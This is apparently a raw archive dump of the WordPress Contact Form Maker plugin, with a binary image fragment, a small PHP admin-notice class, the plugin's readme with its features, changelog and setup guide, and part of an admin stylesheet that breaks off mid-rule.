e`(�M.�{<K�dScM.�����֮��O�![��x=�)�D`�e�)tQTw��T�<9��SPF��~�{��73D]REa�R4�RV+ceIBPM!<J:�-��GH�J�(����s��|<Pt���G,=��Œ�RDJ�/������PM=[z{��W5�RDJ�u--#�0G(0ö�Eєu`�g�իh|x�H�����K`j��RES������@�N���p�E�u`�g[��;!S�7sFESӤ����F����ݿ>��)7�=�h��Z(��}����/0#�uEQ�`,� f���]߁�@?QT����g��2(j�f�G��z"7/_<;m�>j��L���iC�)�/��LԴLE�4���.��E�K_Yӥ�͔#���^&13)uQ4-����.�C�y�襬<\!��Œ3QtB���+��N�oPԔ.e��;�Eӓ����q9�JͻL�a���n�*j�&��D=�Y���;dP��Li��1�N YY~Q=��p`j�j(ot�bZN�H�8�td��q"��X@�N��8t��f+�7����;cZ��/9��.%2�(
(
����p��&���� EPPPEEPPPEEEPPEEEPP`����.���OIEND�B`�fmc_admin_class.php000060400000002541152434416630010365 0ustar00<?php

class FMC_Admin {

	public static $instance = null;

	protected $notices = null;
	public static function get_instance() {
		if ( null == self::$instance ) {
			self::$instance = new self;
		}

		return self::$instance;
	}
	
	private function __construct() {
		$this->notices = new FMC_Notices();

		add_action( 'admin_init', array( $this, 'admin_notice_ignore' ) );
		add_action( 'admin_notices', array($this, 'fmc_admin_notices') );
	}

	
	
	function fmc_admin_notices( ) {
		// Notices filter and run the notices function.

		$admin_notices = apply_filters( 'fmc_admin_notices', array() );
		$this->notices->admin_notice( $admin_notices );

	}
	
	// Ignore function that gets ran at admin init to ensure any messages that were dismissed get marked
	public function admin_notice_ignore() {

		$slug = ( isset( $_GET['fmc_admin_notice_ignore'] ) ) ? $_GET['fmc_admin_notice_ignore'] : '';
		// If user clicks to ignore the notice, run this action
		if ( isset($_GET['fmc_admin_notice_ignore']) && current_user_can( 'manage_options'  ) ) {

			$admin_notices_option = get_option( 'fmc_admin_notice', array() );
			$admin_notices_option[ $_GET[ 'fmc_admin_notice_ignore' ] ][ 'dismissed' ] = 1;
			update_option( 'fmc_admin_notice', $admin_notices_option );
			$query_str = remove_query_arg( 'fmc_admin_notice_ignore' );
			wp_redirect( $query_str );
			exit;
		}
	}
}

?>readme.txt000060400000072410152434416630006552 0ustar00=== Contact Form ===
Contributors: webdorado
Donate link: http://web-dorado.com/products/wordpress-contact-form-maker-plugin.html
Tags:  captcha, contact, contact form, contact forms, custom form, email, feedback, form, form builder, form manager, forms, survey
Requires at least: 3.4
Tested up to: 4.6
Stable tag: 1.8.37
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html

Form plugin is a simple contact form builder tool, which allows the user to create and edit different type of contact forms.   

== Description ==
Create simple contact forms or complex applications forms with this FREE and intuitive WordPress plugin. No coding knowledge is required.   
  
[WordPress Contact Form Maker](http://web-dorado.com/products/wordpress-contact-form-maker-plugin.html)   
 
WordPress Contact Form Maker is a simple contact form builder, which allows the user with almost no knowledge of programming to create and edit different type of contact forms. The product is similar to the WordPress Form Maker using most of its functionality, whereas there are also some differences. If want to build complicated contact forms with various field types like Date, Time, Single choice, Multiple choice, etc., than you can use [WordPress Form Builder](http://wordpress.org/extend/plugins/form-maker).  

The number of fields for the Contact Form Maker is unlimited and having large amount of fields will not cause any malfunctioning of the contact form. You can add different types of contact form fields, including inputs (e.g. e-mail, password, textarea, text input and etc.), Captcha (as well as possibility of adding Google standard ReCaptcha), custom and standard buttons, as well as Map field.  

WordPress Contact Form Maker uses simple and easy to manage backend interface, thus the users which are not able to make code-level changes, will be able to make customization and changes using parameters.  

This contact form builder will be equally fit the needs of the novice and experienced developers and designers.  

The product has cross-browser compatibility, which allows using the Contact form for with any browser.  
###IMPORTANT: If you think you found a bug in the Contact Form Maker or have any problem or question concerning Contact Form Maker, do not hesitate to contact us at [info@web-dorado.com](mailto:info@web-dorado.com).  


###Features of the Contact Form Maker  

*   WordPress 3.0+  
*   7 field types of the Contact Form Maker.  
	*   Custom HTML  
	*   Text Input (10 sub-types)  
	*   Captcha  
	*   Page break  
	*   Section break  
	*   Map  
	*   Button  
*   Possibility to add Custom HTML between the fields . 
*   Pagination.  
*   Support for section break.  
*   Possibility of add custom CSS and Javascript.  
*   Additional attributes for each field to add certain properties using Java Script.  
*   Submissions are send to the provided admin address(es) and submitter (optional).  
*   Custom text for admin and users  
*   Shortcode for easier input of the created contact form into Pages/Posts.  
*   Chance to add custom HTML.  
*   Detailed parameters for each field type.  
*   Data validation before the submission of the contact form.  
*   Detailed Submissions field including the submissions of all contact forms.  
*   10 built-in templates.  
*   Required and hidden fields for advanced contact forms.  
*   Conditional fields


### Supported languages Of the Contact Form Maker  

 *If you need language of the Contact Form Maker which is not included in this list, please contact us and we will do the translation of Contact Form Maker within 3 days. If you find any mistakes in the translation of the Contact Form Maker, please contact us and we will make relevant corrections within 3 days.*  

Afrikaans (af)  
Albanian (sq)  
Arabic (ar)  
Armenian (hy_AM)  
Belarusian (be_BY)  
Bulgarian (bg_BG)  
Catalan (ca)  
Chinese, Simplified (zh_CN)  
Croatian (hr)  
Czech (cs_CZ)  
Danish (da_DK)  
Dutch (nl_NL)  
Esperanto (eo_EO)  
Estonian (et)  
Finnish (fi)  
French (fr_FR)  
Galician (gl_ES)  
Georgian (ka_GE)  
German (de_DE)  
Greek (el)  
Hebrew (he_IL)  
Hindi (hi_IN)  
Hungarian (hu_HU)  
Indonesian (id_ID)  
Italian (it_IT)  
Japanese (ja)  
Korean (ko_KR)  
Latvian (lv)  
Lithuanian (lt_LT)  
Macedonian (mk_MK)  
Malay (ms_MY)  
Maltese (mt_MT)  
Norwegian (nb_NO)  
Persian (fa_IR)  
Polish (pl_PL)  
Portuguese (pt_PT)  
Russian (ru_RU)  
Romanian (ro_RO)  
Serbian (sr_RS)  
Slovak (sk_SK)  
Spanish (es_ES)  
Swedish (sv_SE)  
Tamil (ta)  
Thai (th)  
Turkish (tr_TR)  
Ukrainian (uk_UA)  
Vietnamese (vi)  

== Installation ==    

####Thank you for your interest in [WordPress Contact Form](http://wordpress.org/plugins/contact-form-maker/).  

### Minimum requirements.  
*   Wordpress 3.0+  
*   PHP 5.x  
*   MySQL 5.x  

### Perform a new installation  

After downloading the ZIP file,  

1. Log in to the administrator panel.  
2. Go to Plugins Add > New > Upload.  
3. Click “Choose file” (“Browse”) and select the downloaded zip file.  
*For Mac Users*  
*Go to your Downloads folder and locate the folder with the plugin. Right-click on the folder and select Compress. Now you have a newly created .zip file which can be installed as described here.*  
4. Click “Install Now” button.  
5. Click “Activate Plugin” button for activating the plugin.  
6.If the installation does not succeed, please contact us at info@web-dorado.com. 

### Updating the contact form.  

If you want to update the plugin while preserving your existing contact forms, you need to deactivate and delete the Contact Form Maker from the list of installed plugins (Do not uninstall it using the Uninstall Contact Form Maker option of the plugin) and install the new plugin. Afterwards, go to Contact Form Maker>Manager and on the upper hand of the screen click on the “Update Contact Forms” button. If the update is successful, you will see a notification message saying, “All Contact forms are updated!”.  


== Screenshots ==
1.  [WordPress Contact Form](http://wordpress.org/plugins/contact-form-maker/) - Sample RSVP  
2.  Contact Form Maker - Sample contact form  
3.  Contact Form Maker - Manage contact forms  
4.  Contact Form Maker - Creating a new conact contact form  
5.  Contact Form Maker - Text input field type  
6.  Contact Form Maker - Captcha field type  
7.  Contact Form Maker - Manage submissions  
8.  Contact Form Maker - Select Columns  

== Changelog ==

= 1.8.37 =
* Fixed: Bug on edit_old() function for old forms.   

= 1.8.36 =
* Changed: Featured Themes page   

= 1.8.35 =
* Fixed: Update from very old version   

= 1.8.34 =
* Changed: Featured plugins page   

= 1.8.33 =
* Fixed: Unexpected behaviour on pressing "Enter" key on back end   

= 1.8.32 =
* Fixed: JS error on incorrect Google Maps API key   
* Added: Alert about incorrect Google Maps API key   

= 1.8.31 =
* Added: Global option for Google Maps API key   
* Fixed: Google Maps API key warning in browser    

= 1.8.30 =
* Fixed: bug in new form    

= 1.8.29 =
* Fixed: bug in widget   

= 1.8.28 =
* minor bug fixed 

= 1.8.27 =
* Major update   

= 1.7.33 =
*  Changed: Compability with WordPress 4.3  

= 1.7.32 =
*  Minor bug fixed

= 1.7.31 =
*  Security issue fixed

= 1.7.29 =
*  Cache issue fixed   

= 1.7.28 =
*  Bug fixed: Empty email "From name"

= 1.7.27 =
*  bug fixed in csv\xml export  

= 1.7.26 =
*  bug fixed in email content  

= 1.7.25 =
*  remove fancybox  

= 1.7.24 =
*  display php function to publish form  

= 1.7.20 =
*  4.0.1 shortcode issue fixed   

= 1.6.1 =
*  Added featured plugins  

= 1.6.0 =
*  From Name, From Email in Contact Form options  

= 1.5.0 =
*  Survey Tools (Star Rating, Scale Rating, Spinner, Slider, Range, Grading, Matrix)  

= 1.4.0 = 
*  Customizable Email message for Administrator and Users  

= 1.3.0 =
*  Actions after [WordPress Contact Form](http://wordpress.org/plugins/contact-form-maker/) Submission:  
-	Stay on contact form:   
-	To go to Post,Page after the contact form submission:  
-	Custom text after the contact form submission:   
-	URL: The user is redirected to the provided URL after the contact form submission.  
*  Edit javascript of the contact form:  
*  Save as the copy of the contact form:  
*  Themes: There are 43 standard themes included in Contact Form Maker  
*  New contact form fields:  
-	Address field  
-	Address mark on map contact form field  
-	Number contact form field  
-	Phone contact form field  
-	Date 3 different contact form field  
-	Time contact form field  
-	Country list contact form field  
-	Recapthca contact form field  
*  Pagebreak of the Contact Form Maker: This can be used to break the contact form into distinct pages.  
*  Section Break of the Contact Form Maker: This option allows adding a section break to the contact form page.  
*  For each contact form certain types of statistical data are available in the Contact Form Maker:  
*  Entries of a contact form: The number of submitted contact forms in the Contact Form Maker.  
*  Views of a contact form: The number of times the contact form has been viewed.  
*  Conversion Rate of a contact form: The percentage of submitted contact forms to the overall number of views.  


==Contact Form Maker Step by step guide==    
### Step 1: Installing the [wordpress contact form](http://wordpress.org/plugins/contact-form-maker/)    

1.1 Minimum requirements.  
Wordpress 3.0+  
PHP 5.x  
MySQL 5.x  

1.2 Perform a new installation.  
Log in to the administrator panel.  
Go to Plugins Add > New > Upload.  
Click “Choose file” (“Browse”) and select the Contact Form Maker zip file.  
*For Mac Users*  
*Go to your Downloads folder and locate the folder with the plugin. Right-click on the folder and select Compress. Now you have a newly created .zip file which can be installed as described here.*  
Click “Install Now” button.  
If the installation succeeded you will see the message in the picture. Click “Activate Plugin” button for activating the plugin.    
If any problem occurs, please contact us at info@web-dorado.com. 

1.3 Updating the contact form.  

If you want to update the plugin while preserving your existing contact forms, you need to deactivate and delete the Contact Form Maker from the list of installed plugins (Do not uninstall it using the Uninstall Contact Form Maker option of the plugin) and install the new plugin. Afterwards, go to Contact Form Maker>Manager and on the upper hand of the screen click on the “Update Contact Forms” button. If the update is successful, you will see a notification message saying, “All Contact forms are updated!”.  


= Step 2: Creating a new contact form =    

2.1 On the left menu select Contact Form Maker > Manager  
2.2 In the upper left corner click on the “Add a form” button.  
2.3 Contact Form Title. Specify a title for the contact form.  


= Step 3: Configuring Contact Form Options =    

3.1 General Options  
3.1.1 Email to send submissions to. Here you provide e-mails to which submitted contact form information is sent. If you need more than one e-mail address, you must separate them by commas. This field is not required. In any case, the submitted information is stored in “Submissions” part, where it can be easily managed.  
3.1.2 Email From. Here you define the email address from which the users receive the submission email (sender’s email).  
3.1.3 From Name. Here you define the sender’s name which is shown in submission email.  
3.1.4 Theme. A distinct theme can be applied to each new contact form. The themes can be accessed by selecting Contact Form Maker > Themes on the top menu. 41 themes are available for selection. There is an option for creating new themes, which you can access by clicking “New” on the upper right corner of the section.  

3.2 Actions after Submission  
Here you can select the action that takes place after contact form submission. Following options are available:  
- Stay on contact form: The user stays on the contact form page.  
- Article: The user is redirected to the selected article.  
- Custom text: Custom text is displayed on the screen.  
- URL: The user is redirected to the provided URL.  
3.3 Payment Options  
3.3.1 Turn on PayPal. Allows making PayPal paymentsusing Contact Form Maker.  
3.3.2 Checkout Mode. Choose the checkout mode:  
Production (https://developer.paypal.com/webapps/developer/docs/classic/lifecycle/goingLive/)  
Test Mode (https://developer.paypal.com/webapps/developer/docs/integration/direct/test-the-api/)  
3.3.3 PayPal Email. Enter your PayPal email.  
3.3.4 PayPal Currency. Choose your PayPal currency.  
3.3.5 Tax. Add the tax amount if any.  
3.4 JavaScript  
Here you can define new JavaScript functions, which can be applied to the contact form. Three empty event functions are included:  
- before_load(): before the contact form is loaded  
- before_submit(): before the contact form is submitted  
- before_reset(): before the contact form is reset  
3.5 Custom Text in Email  
For Administrator. Here you can add custom texts, images, and custom HTML to the e-mail message that is sent to the administrator, as well as choose which fields of the submitted contact form are included in the e-mail (set to ‘all’ by default).  
For User. Here you can add custom texts, images, and custom HTML to the e-mail message that is sent to the users, as well as choose which fields of the submitted contact form are included in the e-mail (set to ‘all’ by default).  

= Step 4: Description of the contact form fields =    

4.1 Custom HTML:An HTML editor. You can insert your own HTML content to your WordPress contact form.  

4.2 Text Input: At first choose the Field Type according to your preference. There are several options:  
Simple Text: This can be used for typing some text. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Value If Empty, Class Name, Required, Allow only unique values, Additional Attributes  

Password: This field can be used for adding a password field to your contact form. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Class Name, Required, Allow only unique values, Additional Attributes  
Text Area: This field can be used for typing some text. The difference between Text Area and Simple Text is that Simple Text has only one row while Text Area can have several rows. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Value If Empty, Class Name, Required, Allow only unique values, Additional Attributes  
Name: This can be used for typing a name. Default field labels can be edited clicking on the field label and typing in a custom label. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Value If Empty, Field Size, Name Format, Class Name, Required, Allow only unique values, Additional Attributes  
Address: This field can be used for adding an address. Default field labels can be edited clicking on the label and typing in a custom label. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Overall Size, Class Name, Disable Fields, Required, Additional Attributes  
Address (Mark on Map):This filed can be used for adding an address by directly marking it on the map. It has several attributes: Field Label, Field Label Position, Default Location, Map Size, Marker Info, Class Name, Additional Attributes  
E-mail:This field can be used for typing the submitter’s e-mail. The submitted e-mail validation is checked. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Value If Empty, Class Name, Send mail to submitter, Required, Allow only unique values, Additional Attributes.  
Number: This field can be used to provide numbers for different purposes (e.g. serial number). It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Value If Empty, Class Name, Required, Allow only unique values, Additional Attributes  
Phone: This field can be used to provide a phone number. Default field labels can be edited clicking on the label and typing in a custom label. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Value If Empty, Field Size, Class Name, Required, Allow only unique values, Additional Attributes  
Hidden Field: This field can be used to store additional information that does not need to be displayed. It has several attributes : Field ld, Field Name, Field Value, Additional Attributes.  
4.3 Time and Date: Choose the Field Type according to your preference. There are several options:  
Date (single field with a picker): This field can be used for typing a date or choosing by the picker. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Date format, Date Picker Label, Class Name, Required, Additional Attributes.  
Date (3 separate fields): This field can be used for typing a date in 3 field format(day, month, year). Default field labels can be edited clicking on the field label and typing in a custom label. Each of the 3 fields can be set as text input or select list. Each of the 3 fields has the attributes Field Size and Field Label. For year field the select list interval can be defined. These 3 fields can be separated in the format set by the fields separator attribute. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Class Name, Required, Additional Attributes.  
Time: This field can be used for typing a time. Default field labels can be edited clicking on the field label and typing in a custom label. Time can be shown in 24 hour or 12 hour formats by setting the time format attribute. The seconds preview can be enabled/disabled by setting the Display Seconds attribute. The field has several standard attributes: Field Id, Field Name, Field Label, Field Label Position, Class Name, Required, Additional Attributes.  
4.4 Select: Choose the Field Type according to your preference. There are several options:  
Custom select: This field can be used for selecting the values from a list. The list can be defined by Options attribute. You can easily add and remove list items. The checked items are considered as empty values. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Class Name, Required, Additional Attributes.  
Country list: This field can be used for selecting a country from a list. It has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Class Name, Required, Additional Attributes.  
4.5 Checkbox: This field can be used for selecting the values from a list of checkboxes. The list can be defined by Options attribute. You can easily add and remove list items. The list can be displayed in horizontal/vertical positions by setting the Relative Position attribute. You can use Rows/Columns field if you want the options to be displayed in a row/column (depending on the positioning choice). The number of rows/columns should be specified. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Class Name, Required, Randomize in frontend, Allow other, Additional Attributes.  

4.6Radio:This field can be used for selecting the values from a list of radio buttons. The list can be defined by Options attribute. You can use Rows/Columns field if you want the options to be displayed in a row/column (depending on the positioning choice). The number of rows/columns should be specified. You can easily add and remove list items. The list can be displayed in horizontal/vertical positions by setting the Relative Position attribute.The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Field Size, Class Name, Required, Randomize in frontend, Allow other, Additional Attributes.  

4.7 File Upload: This field can be used for uploading a file. The size of the uploaded file can be limited by setting the value of Maximum Size attribute in KB. The upload folder can be mentioned by setting the Destination attribute. Only files with extensions listed in Allowed file extensions attribute can be uploaded. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Class Name, Required, Additional Attributes.  

4.8 Captcha:This field can be used for the ensuring that the submission is generated by a person. Choose the Field Type according to your preference. There are several options:  
Simple Captcha This is a easy to configure Simple Captcha. The number of randomly generated symbols can be set by the value of Captcha size attribute. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Class Name, Additional Attributes.  
Recaptcha This is an alternative option for Captcha that uses Public and Private Keys. You will need to create reCaptcha keys with the help of a dedicated tool.The tool can be found on https://www.google.com/recaptcha/admin/create.  

4.9 Page Break: This can be used to break the contact form into distinct pages. Use Page Title to provide a title for the given page. Furthermore, the following parameters of the “Next” and “Previous” navigation buttons can be customized:  
Type, Name, Class Name, Check the required fields , Additional Attributes.  

4.10 Section Break: This option allows adding a section break to the contact form page.  

4.11 Map: This field can be used for pointing out some position on the map. The position of the marker is fixed at the front end. Multiple locations can be selected by clicking the + button. The field has several attributes:  
Location, Map Size, Marker Info, Class Name, Additional Attributes.  

4.12 PayPal: Choose the Field Type. The following options are available:  
Amount (Price) This field is for indicating the amount of payment. Default field labels can be edited clicking on the field label and typing in a custom label. You can configure the following attributes: Field Label, Field Label Position, Range, Value If Empty, Field Size, Class Name, Required, Hide Cents, and Additional Attributes.  
Select This field can be used for selecting a product/service for which the payment is being made. The list (each item consists of “Product name” and its “Price”)can be specified by the Options attribute. You can easily add and remove list items. There is also a Product Properties parameter, where you can add different properties (e.g. size) by specifying the type, the name, and adding options for selection. The checked items are considered as empty values. You can configure the following attributes: Field Label, Field Label Position, Field Size, Class Name, Required, and Additional Attributes.  
Checkbox This field can be used for selecting multiple products/services for which the payment is being made. The options (each item consists of “Product name” and its “Price”) can be specified by the Options attribute. You can easily add and remove list items. There is also a quantity property parameter where the quantity of products/services can be specified. Moreover, there is a Product Properties parameter, where you can add different properties (e.g. size) by specifying the type, the name, and adding options for selection. You can configure the following attributes: Field Label, Field Label Position, Relative Position, Class Name, Required, and Additional Attributes.  
Radio This field can be used for selecting the product/service for which the payment is being made. The options (each item consists of “Product name” and its “Price”) can be specified by the Options attribute. You can easily add and remove list items. There is also a quantity property parameter where the quantity of products/services can be specified. Moreover, there is a Product Properties parameter, where you can add different properties (e.g. size) by specifying the type, the name, and adding options for selection. You can configure the following attributes: Field Label, Field Label Position, Relative Position, Class Name, Required, and Additional Attributes.  
Shipping This field can be used for selecting the shipping option for the selected product. The options (each item consists of a “Type” and “Price” parameters) can be specified by the Options attribute. You can easily add and remove list items. You can configure the following attributes: Field Label, Field Label Position, Relative Position, Class Name, Required, and Additional Attributes.  
Total This field calculates the total sum to be paid via PayPal, including the payments for the shipping and taxes (if applicable).  

4.13 Survey Tools: Choose the Field Type according to your preferences. There are several options:  
Star Rating: This field can be used for inserting star rating field in the contact form. Type the name of the field to be displayed with the rating system. The field has several attributes: Field Label Position, Star Amount, Star Color, Class Name, Required, and Additional Attributes.  
Scale Rating: This field can be used for inserting scale rating in the contact form. Type the name of the field to be displayed with the rating system.Default field labels for lowest/highest satisfaction/grading can be edited clicking on the field label and typing in a custom label. The field has several attributes: Field Label Position, Scale Amount, Class Name, Required, and Additional Attributes.  
Spinner: This field can be used for inserting spinner as a rating system in the contact form. Type the name of the field to be displayed with the rating system. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Width, Min Value, Max Value, Step, Class Name, Required, and Additional Attributes.  
Slider: This field can be used for inserting slider as a rating system in the contact form. Type the name of the field to be displayed with the rating system. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Width, Min Value, Max Value, Class Name, Required, and Additional Attributes.  
Range: This field can be used for inserting range system in the contact form. Type the name of the field to be displayed with the range system. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Width, Step, Class Name, Required, and Additional Attributes.  
Grading: This field can be used for inserting grading system in the contact form. Type the name of the field to be displayed with the grading system. The field has several attributes: Field Id, Field Name, Field Label, Field Label Position, Total, Items, Class Name, Required, and Additional Attributes.  
Matrix: This field can be used for inserting a matrix in the contact form. Type the name of the field to be displayed with the matrix. The field has several attributes: Field Label, Field Label Position, Input Type, Rows, Columns, Class Name, Required, and Additional Attributes.  
4.14 Submit Button: Choose the Field Type according to your preference. There are several options:  
Submit and Reset: This field can be used for inserting a submit/reset button into the contact form. You can display reset button by checking the box called Display reset button. Type the name of the submit and reset buttons in Submit button label and Reset button label. The field also has several attributes: Class Name and Additional Attributes.  
Custom: This field can be used for inserting custom buttons into the contact form. Type the name of each button in button name field. You can define click functions for each button. The field also has several attributes: Class Name and Additional Attributes.  

= Step 5: Publishing the created contact form. =    

To insert a contact form into a Page or a Post.  


  
  5.1. Press the button named Insert Contact Form Maker in a post or a page you want to show the contact form.  

  5.2. Select a contact form from the list.  


  
  5.3. Save the page or the post.  

Alternatively, you can use Contact Form Maker without the button on the toolbar: Add the shortcode [wd_contact_form id="N"] (where N is the id of the contact form, for the contact form with id=2, the shortcode must be [wd_contact_form id="2"]) to the pages and posts, where you want the contact form to appear.  

  
= Step 6: Managing submissions of the contact form. =    
  
6.1 On the left menu select Contact Form Maker > Submissions  

6.2 In order to manage a contact form's submissions, select the contact form from the list.  

6.3 For each contact form certain types of statistical data are available:  
- Entries: The number of submitted contact forms.  
- Views: The number of times the contact form has been viewed.  
- Conversion Rate: The percentage of submitted contact forms to the overall number of views.  

6.4 For the contact forms that contain checkboxes or radio buttons a separate statistics is available. It shows how many times a particular checkbox/radio button has been checked, and what is the ratio of that number to the overall number of checks.  

6.5 There is a possibility to search the submissions database by all the relevant fields of the given contact form. Submissions can be sorted by any of the fields of the contact form by clicking the labels.  


6.6 You can delete any of submissions by selecting them and pressing the “Delete” button on the top of the page.  

6.7 It is also possible to edit the submissions by clicking on the “Edit” icon on the upper right corner of the “Submissions” section.  


6.8 You can add/remove any column of the submissions by “Add/Remove Columns” button.  

  

6.9 The submissions can be exported to the CSV and XML formats.css/form_maker_tables.css000060400000043254152434416630011536 0ustar00#main_div input[type="checkbox"], #main_div input[type="radio"] {
	float: right !important;
	margin: 3px 3px 3px 4px;
}

 .wdform_column  input[type="checkbox"],.wdform_column   input[type="radio"] {
	float: right !important;
	margin: 3px 3px 3px 4px;
}

#take_temp .element_toolbar,
#take_temp .page_toolbar,
#take_temp .captcha_img,
#take_temp .wdform_stars {
	display: none;
}


/*///////////////
 new 
//////////////*/
#TB_window,
#TB_overlay {
  z-index: 10200;
}

fieldset input,
fieldset textarea,
fieldset select,
fieldset img,
fieldset button {
	float:none !important;
}

fieldset input[type="text"],
fieldset input[type="password"],
fieldset input[type="number"],
fieldset select {
	height: 27px !important;
    margin: 2px 0 !important;
    padding: 2px !important;
    border-radius: 0;
    width: 250px;
    border: 1px solid #ccc;
    box-shadow: none;
    vertical-align: middle;
}

#when_edit {
	position: absolute;
	background-color: #666;
	z-index: 101;
	display: none;
	width: 100%;
	height: 100%;
	opacity: 0.7;
	filter: alpha(opacity=70);
}


#formMakerDiv {
	position: fixed;
	background-color: #666;
	z-index: 100;
	display: none;
	left: 0;
	top: 0;
	width: 100%;
	height: 100%;
	opacity: 0.7;
	filter: alpha(opacity=70);
}

#formMakerDiv1 {
	padding-top: 20px;
	position: fixed;
	z-index: 10000;
	top: 0;
	left: 0;
	display: none;
	margin-left: 30px;
	margin-top: 12px;
	height: 93%;
	overflow-y: scroll;
	width:95%;
}

.formMakerDiv1_table {
	font-family: Segoe UI !important;
	background-color: #FFF;
}

#field_types {
    border-right: 4px solid #E5E5E5;
    background: #F2F2F2;
}



/* submissions */

#sbox-overlay {
	z-index: 65555; 
	position: fixed; 
	top: 0px; 
	left: 0px;
	visibility: visible;
	zoom: 1; 
	background-color: #000000; 
	opacity: 0.7; 
	filter: alpha(opacity=70); 
	display: none;
}

#ChBDiv {
	background-color: #FFFFFF; 
	width: 350px; 
	max-height: 350px; 
	overflow-y: auto;
	padding: 20px; 
	position: fixed;
	top: 100px;
	display: none; 
	border: 2px solid #AAAAAA;  
	z-index: 65556;
}

.fm-submissions-page {
	width:99%;
}

.submit_content {
	overflow-x: auto; 
}

.fm-reports {
    text-align: left;
	display:inline-block;
	vertical-align: middle;
}

.fm-tools-button {
    border: 1px solid;
    border-radius: 0px;
    text-align: left;
    color: #0288C5;
    height: 40px;
    line-height: 40px;
    display: inline-block;
    padding: 0px 10px;
	background: #F1F1F1;
    border-color: #F1F1F1;
	font-size:15px;
}

.fm-total_rate, .fm-total_entries, .fm-total_views {
    display: inline-block;
    line-height: 18px;
    padding: 5px 10px;
    border-radius: 37px;
    font-size: 16px;
	background: #fff;
    border: none;
	margin-right: 6px;
}


.fm-form-title {
    text-align: left;
    display: inline-block;
    height: 46px;
    line-height: 46px;
    font-size: 28px;
    font-weight: bold;
    max-width: 450px;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}

.submissions-actions {
    height: 70px;
    line-height: 50px;
}

.submissions-toolbar {
    background: #fff;
    height: 100px;
    line-height: 100px;
}

.submissions-tools {
    padding: 0 10px;
}

.submissions-tools select {
    height: 41px;
	width:280px;
    max-width: 280px;
    border: 1px solid #f1f1f1;
    font-style: italic;
    border-radius: 0px;
	margin-left:7px;
	box-shadow:none;
}

.fm-export-tools {
	float:right;
}

.fm-export-tools span {
	display: inline-block;
	font-size:15px;
	color:#0288C5;
}

.fm-export-tools button{
	cursor:pointer;
}

.fm-search-tools {
	float:left;
}

.fm-search-tools button {
	margin-right:2px;
}

.fm-add-remove{
	float:right;
}

.fm-add-remove button {
    font-size: 13px;
    background: #4EC0D9;
    width: 154px;
	margin-right:15px;
}


.fm-statistics{
    background: #fff;
    padding: 10px 10px 20px 10px;
}
	
.fm-statistics .stats tr {
	border: none !important;
}

.fm-statistics .stats td {
	border: none !important;
	padding: 5px 3px;
	vertical-align: middle;
}

.fm-statistics .stats select{
    height: 31px;
    width: 298px;
    max-width: 298px;
    border: 1px solid #E6E4E4;
    font-style: italic;
    border-radius: 0px;
    margin-left: 7px;
    box-shadow: none;
}

.fm-statistics #div_stats .field-label {
	font-size: 16px;
    font-weight: bold;
}
	
.fm-statistics .stats button{
    display: inline-block;
    height: 27px;
    line-height: 27px;
    border-radius: 0px;
    font-size: 12px;
    font-weight: bold;
    padding: 0 14px;
    cursor: pointer;
    text-align: center;
    color: #fff;
    border: none;
    background: #4EC0D9;
}

.fm-statistics .stats input{
	border-radius: 0px;
    border: 1px solid #E6E4E4;
    box-shadow: none;
    vertical-align: middle;
}	

.fm-statistics .stats label{
	font-size:14px;
}

.fm-statistics .label0{
	background:#4EC0D9;
	border: 2px solid #4EC0D9;
}

.fm-statistics .label1
{
	background:#DDCC7F;
	border: 2px solid #DDCC7F;
}

.fm-statistics .bordered0:before
{
	content: " ";
	width:20px;
	height:16px;
	margin-left: -15px;
	background:#5FE2FF;
	display: inline-block;
	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);
}
	
.fm-statistics .bordered1:before
{
	content: " ";
	width:20px;
	height:16px;
	margin-left: -15px;
	background:#F9E89C;
	display: inline-block;
	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);
}

.fm-statistics .adminlist{
	border-collapse: separate;
	font-size:14px;
	width: 100%;
}
	
.fm-statistics .adminlist th
{
	font-size:14px;
	padding: 10px 0;
}
	
.fm-statistics .adminlist td
{
	border: none !important;
}
	
.fm-statistics .adminlist td:first-child
{
	color:#fff;
	padding: 4px;
}


.fm_layout {
	width:99%;
	padding:15px 0;
}

.fm-layout-actions:after {
	clear:both;
	content:'';
	display:block;
}

.fm-layout-content {
	background:#fff;
	padding:10px 10px 20px 10px;
	margin-top:15px;
}
/*///////////////
 new end
//////////////*/



/*  form options  */
.fm-form-options {
	background:#fff;
	padding: 13px;
}

.submenu-box {
	width: 100%; 
	padding: 15px 0;
}

.submenu-pad {
	float:left;
}

.submenu-box:after {
	display:block;
	content:'';
	clear:both;
}

#submenu {
	margin: 0;
	padding: 0;
}

#submenu li {
	display: inline;
	margin: 0;
	padding: 0;
}

#submenu a:hover,
#submenu a.active,
#submenu span.nolink.active {
	background: none repeat scroll 0 0 #FFFFFF;
	border: 1px solid #46ACC3
}

#submenu a:focus {
	box-shadow: none !important;
} 

#submenu li a,
#submenu span.nolink {
    border: 1px solid #F1F1F1;
    color: #444;
    cursor: pointer;
    font-size: 13px;
    font-weight: bold;
    padding: 12px;
    background: #fff;
    text-decoration: none;
	display:inline-block; 
}


fieldset.adminform {
    width: 99%;
    margin: 10px 0;
}

fieldset.adminform legend {
    color: #444;
    font-weight: bold;
    font-size: 16px;
    padding: 10px 3px;
}

.wp-list-table td{
